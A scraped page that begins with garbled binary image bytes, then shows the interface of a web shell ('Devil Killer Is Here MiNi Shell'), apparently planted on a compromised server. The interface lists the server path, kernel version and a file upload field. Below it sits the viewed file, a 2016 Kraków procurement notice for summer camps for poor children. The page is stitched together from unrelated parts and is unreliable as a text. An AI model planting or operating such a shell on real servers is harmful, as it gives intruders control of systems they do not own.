JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160614/83731-N-2016.html

<p class="kh_header"><b>Kraków: Usługi w zakresie zorganizowania wypoczynku letniego dla dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego</b><br>
<b>Numer ogłoszenia: 83731 - 2016; data zamieszczenia: 14.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kuratorium Oświaty w Krakowie , ul. Ujastek 1, 31-752 Kraków, woj. małopolskie, tel. 12 448 11 10, faks 12 448 11 62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kuratorium.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie zorganizowania wypoczynku letniego dla dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie letniego wypoczynku dla dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego.
Wspólny słownik zamówień - kod CPV - 55243000-5 Usługi w zakresie obozowisk dla dzieci. Przedmiot zamówienia jest podzielony na 3 części:
część I: Zorganizowanie na terenie powiatu gorlickiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów wypoczynkowych w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze;
część II: Zorganizowanie na terenie powiatu tarnowskiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów wypoczynkowych w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze;
część III: Zorganizowanie na terenie powiatu tatrzańskiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów wypoczynkowych w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze.
Zamawiający dopuszcza składanie ofert częściowych. Jeden Wykonawca może złożyć ofertę częściową tylko na jedną część zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy. Zamówienia uzupełniające będą zgodne z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 92a - 92t ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.), tj. przedłożą oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy legitymują się wiedzą w przedmiocie organizacji wypoczynku dzieci i młodzieży z rodzin najuboższych, posiadają doświadczenie w organizacji wypoczynku dzieci i młodzieży z rodzin najuboższych, tj. udokumentują, że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę polegającą na organizacji wypoczynku dla dzieci i młodzieży z rodzin najuboższych, w wymiarze co najmniej jednego 12 dniowego turnusu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy mają odpowiednią bazę lokalową z zapleczem technicznym i gospodarczym wraz z wyposażeniem w sprzęt rekreacyjno-sportowy tj. udokumentują dysponowanie bazą lokalową, która może przyjąć jednorazowo co najmniej 90 uczestników wypoczynku na warunkach opisanych w punkcie 4 niniejszej specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia tj. wykwalifikowaną kadrę z uprawnieniami do wykonywania powierzonych zadań (kierownik wypoczynku, wychowawcy wypoczynku, opieka medyczna), tj. udokumentują dysponowanie kierownikiem wypoczynku i wychowawcami spełniającymi kryteria określone w  art. 92p ust. 1-6 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.), oraz pielęgniarką z prawem wykonywania zawodu, zgodnie z ustawą z dnia 15 lipca 2011 r. o zawodach pielęgniarki i położnej (Dz. U. z 2014 r., poz. 1435 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. przedłożą oświadczenie o spełnianiu warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania w wykazie dotyczy usług odpowiadających swoim rodzajem przedmiotowi zamówienia w wymiarze co najmniej jednego 12-dniowego turnusu wypoczynku dzieci i młodzieży. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów na ich wykonanie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Program wypoczynku,
2. Kalkulacja kosztów.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenie prawidłowego umocowania do reprezentowania podmiotu, Wykonawca składa:
aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie z ewidencji działalności gospodarczej. Podmioty, dla których przepisy odrębne nie wymagają wpisu do właściwego rejestru lub zgłoszenia do ewidencji działalności gospodarczej, dołączają statut; pisemne pełnomocnictwo do reprezentowania Wykonawcy, obejmujące umocowanie do przystąpienia podmiotu do przetargu nieograniczonego i zawarcia umowy w wyniku przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego. Pełnomocnictwo powinno być złożone w oryginale lub w formie kserokopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ocena standardu obiektu - 10</li>
<li>3 - Doświadczenie wykonawcy zamówienia - 10</li>
<li>4 - Atrakcyjność programu pobytu - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kuratorium.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kuratorium Oświaty w Krakowie, ul. Ujastek 1, 31-752 Kraków, pokój 247..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2016 godzina 12:00, miejsce: Kuratorium Oświaty w Krakowie, ul. Ujastek 1, 31-752 Kraków, Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie na terenie powiatu gorlickiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów wypoczynkowych w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I: Zorganizowanie na terenie powiatu gorlickiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów wypoczynkowych w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze:
a) wypoczynek powinien uwzględniać zainteresowania tematyką historyczną i patriotyczną, z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu;
b) turnusy wypoczynkowe powinny ponadto posiadać wartość rekreacyjną z elementami związanymi z promowaniem zdrowego stylu życia wśród dzieci i młodzieży, zainteresowaniem aktywnością fizyczną, tematyką i działaniami rozwijającymi nawyk dbania o zdrowie fizyczne i psychiczne oraz zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację i edukację kulturalną;
c) organizacja wypoczynku musi być zgodna z wymogami ustawy z dnia 7 września 1991 r. 
o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.), a w szczególności jej art. 92a - 92t oraz rozporządzenia Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz. U. poz. 452);
d) dla realizacji zadania Wykonawca winien wykazać się posiadaniem stałej bazy lokalowej, która jest odpowiednia do prowadzenia zajęć w grupach oraz umożliwia prowadzenie form ruchowych o charakterze rekreacyjnym dla każdej z grup wychowawczych. Obiekt, w którym ma być zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska;
e) program wypoczynku:
Wykonawca powinien uwzględnić w programie wypoczynku zainteresowania tematyką historyczną i patriotyczną z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu,
Wykonawca powinien zapewnić realizację wypoczynku z elementami zajęć związanych z promowaniem profilaktyki oraz zdrowego stylu życia wśród dzieci i młodzieży, powinien zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację i edukację kulturalną, w programie wypoczynku powinien zostać przewidziany udział tematyki 
i działań rozwijających nawyk dbania o zdrowie fizyczne i psychiczne,
Wykonawca winien przewidzieć w ramach turnusu przynajmniej jedną atrakcyjną całodniową wycieczkę autokarową poza miejscowość w której odbywają się kolonie oraz zajęcia uwzględniające specyfikę wybranego zadania, dostosowane do rozwoju psychomotorycznego dziecka;
f) Wykonawca w organizacji kolonii uwzględnia:
koszty ubezpieczenia dzieci i kadry w czasie podróży i pobytu na koloniach od następstw nieszczęśliwych wypadków,
koszty dowozu (do placówki i z placówki wypoczynku); środki nie wykorzystane na ten cel przechodzą na realizację programu;
koszty biletów wstępu do zwiedzanych obiektów;
g) wyżywienie:
Wykonawca zapewnia minimum cztery posiłki dziennie (śniadanie, obiad, podwieczorek, kolacja);
Wykonawca zapewnia gorący posiłek po przyjeździe dzieci do placówki wypoczynku (bez względu na godzinę przyjazdu), oraz suchy prowiant na drogę powrotną oraz na czas wycieczek; Wykonawca zapewnia stały dostęp do napojów ciepłych lub zimnych w zależności od warunków pogodowych; Wykonawca zapewnia żywienie zgodne z zasadami higieny żywienia określonymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594 
z późn. zm.);
